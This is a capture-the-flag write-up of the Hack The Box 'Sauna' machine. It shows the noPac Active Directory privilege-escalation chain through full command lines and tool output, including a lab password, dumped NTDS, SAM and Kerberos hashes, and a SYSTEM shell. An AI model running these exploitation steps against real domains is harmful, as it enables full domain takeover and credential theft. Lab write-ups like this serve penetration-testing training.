CVE-2021-42278/CVE-2021-42287
The target system might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact it is relatively older and doesn’t seem to have patch installed for it
By default, any domain user has the SeMachineAccountPrivilege privilege enabled and I have already confirmed that the fsmith user has the privileges enabled
Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely
*evil-winrm* ps c:\Users\FSmith\Documents> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=EGOTISTICAL-BANK,DC=LOCAL
ms-ds-machineaccountquota : 10
name : EGOTISTICAL-BANK
objectclass : domainDNS
objectguid : 504e06ec-22c1-43a1-93c0-cf4807f83363
Notice the ms-DS-MachineAccountQuota attribute set to 10
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ ldapsearch -x -h ldap://egotistical-bank.local:389 -D '' -w '' -b 'DC=EGOTISTICAL-BANK,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10Through ldapsearch, it can also be checked remotely
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
Testing
┌──(kali㉿kali)-[~/archive/htb/labs/sauna]
└─$ cme smb $IP -d EGOTISTICAL-BANK.LOCAL --kdcHost sauna.egotistical-bank.local -u fsmith -p Thestrokes23 -M nopac
smb 10.10.10.175 445 sauna [*] windows 10.0 build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
smb 10.10.10.175 445 sauna [+] egotistical-bank.local\fsmith:Thestrokes23
NOPAC 10.10.10.175 445 SAUNA TGT with PAC size 1580
NOPAC 10.10.10.175 445 SAUNA TGT without PAC size 775
NOPAC 10.10.10.175 445 SAUNA
NOPAC 10.10.10.175 445 SAUNA VULNEABLE
nopac 10.10.10.175 445 sauna next step: https://github.com/Ridter/noPaccrackmapexec has a module available to test for the nopac exploit above As the result shown above, the target system is confirmed to be vulnerable
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/sauna/noPac]
└─$ python3 noPac.py 'EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23' --impersonate administrator -dc-ip $IP -use-ldap -dump
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target sauna.egotistical-bank.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-ARGRI7MJOKU$"
[*] MachineAccount "WIN-ARGRI7MJOKU$" password = H$rvmdIx2^fx
[*] Successfully added machine account WIN-ARGRI7MJOKU$ with password H$rvmdIx2^fx.
[*] WIN-ARGRI7MJOKU$ object = CN=WIN-ARGRI7MJOKU,CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] WIN-ARGRI7MJOKU$ sAMAccountName == sauna
[*] Saving a DC's ticket in sauna.ccache
[*] Reseting the machine account to WIN-ARGRI7MJOKU$
[*] Restored WIN-ARGRI7MJOKU$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_sauna.egotistical-bank.local.ccache
[*] Attempting to del a computer with the name: WIN-ARGRI7MJOKU$
[-] Delete computer WIN-ARGRI7MJOKU$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x6d261a4763682dbf58336ec3dc7ff268
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EGOTISTICALBANK\SAUNA$:plain_password_hex:0bf15d9433742c2773d5972b72d04f812ede58d233bc1cd4d9a31497a887029baff4a2c19bfb5931457377d25027d21e428500712821d8890413fe61d09c7cfbe45c5f115a14c00c04e99e6432813588506f68f90836dddf561b513478526cd0ee6066c0db0f51b731668d1fe3ddb33f8a44ee25037693b854ad4204065542a5a4334c6e86142e7ea0784379f6378cfd771e2f278d71b7e8c2db27c3f7b351e50e63d997f49addc1828c110b2df5a2673621e310e1f8ab1fa566e38eb369e97468b99f403cee6ceadb865be6817e737b238574d753e1267a3e4f7cc57fe5e10c92b884421c6759f958d3fd5fa3370c60
EGOTISTICALBANK\SAUNA$:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x2460a9de840f81ad5f31efc8b864e55672bd8c44
dpapi_userkey:0x466a52963a9bc1175c7b9109f3cae6bf1b46989e
[*] NL$KM
0000 87 2B 1B 92 A2 F4 CC 90 DF FF F7 A1 A4 50 61 C3 .+...........Pa.
0010 4A 11 6B B6 89 3D CD A0 E0 4D 40 61 A2 7F 79 68 J.k..=...M@a..yh
0020 9C CF BD 0C 8B F2 96 B9 74 42 A0 53 F4 09 32 0A ........tB.S..2.
0030 8F 86 0E 5F 5A BD ED 1A 84 0F 66 0E A1 52 BC 7B ..._Z.....f..R.{
NL$KM:872b1b92a2f4cc90dffff7a1a45061c34a116bb6893dcda0e04d4061a27f79689ccfbd0c8bf296b97442a053f409320a8f860e5f5abded1a840f660ea152bc7b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:5dc91efb42d910e053e11dffa46bf5d6:::
WIN-AVOBJSNQI4E$:4101:aad3b435b51404eeaad3b435b51404ee:f5d7c0e3775ca7a325a2d9ea1d6aa85c:::
WIN-ARGRI7MJOKU$:4102:aad3b435b51404eeaad3b435b51404ee:c8c3b17e8cbb1ad86660af0c61a221e4:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:169b40d92b9b50b70712649ec010a4941314a10e61443b9249bc483d94012825
SAUNA$:aes128-cts-hmac-sha1-96:5a9b17710de61c6181ca21a297276b0e
SAUNA$:des-cbc-md5:ef6d38977fea32d9
WIN-AVOBJSNQI4E$:aes256-cts-hmac-sha1-96:ae10bf959b90ebbeecd67b223b6974d235f8118dcd870e72fb25090577a86fd6
WIN-AVOBJSNQI4E$:aes128-cts-hmac-sha1-96:b5b6c8e3a72a3d8bdaedcf4e5e305d3d
WIN-AVOBJSNQI4E$:des-cbc-md5:2643d5f410e515fe
WIN-ARGRI7MJOKU$:aes256-cts-hmac-sha1-96:ebeb999cdaae3ebccdd641a8be90b75a915dfa8db22b78174e4e90b0849353df
WIN-ARGRI7MJOKU$:aes128-cts-hmac-sha1-96:e84073c311e90e0fa4dd96cfc1d94dcc
WIN-ARGRI7MJOKU$:des-cbc-md5:202f04a17c542513
[*] Cleaning up... Domain Level Compromise
ShellDrop
┌──(kali㉿kali)-[~/…/htb/labs/sauna/noPac]
└─$ python3 nopac.py 'egotistical-bank.local/fsmith:Thestrokes23' -dc-ip $IP -use-ldap -shell
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target sauna.egotistical-bank.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-IK7ZYRL5NJL$"
[*] MachineAccount "WIN-IK7ZYRL5NJL$" password = S0BGOl#xd7M5
[*] Successfully added machine account WIN-IK7ZYRL5NJL$ with password S0BGOl#xd7M5.
[*] WIN-IK7ZYRL5NJL$ object = CN=WIN-IK7ZYRL5NJL,CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] WIN-IK7ZYRL5NJL$ sAMAccountName == sauna
[*] Saving a DC's ticket in sauna.ccache
[*] Reseting the machine account to WIN-IK7ZYRL5NJL$
[*] Restored WIN-IK7ZYRL5NJL$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_sauna.egotistical-bank.local.ccache
[*] attempting to del a computer with the name: WIN-IK7ZYRL5NJL$
[-] Delete computer WIN-IK7ZYRL5NJL$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
SAUNA
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::17a
ipv6 address. . . . . . . . . . . : dead:beef::64df:5bff:4879:1d8b
link-local ipv6 address . . . . . : fe80::64df:5bff:4879:1d8b%7
ipv4 address. . . . . . . . . . . : 10.10.10.175
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%7
10.10.10.2System Level Compromise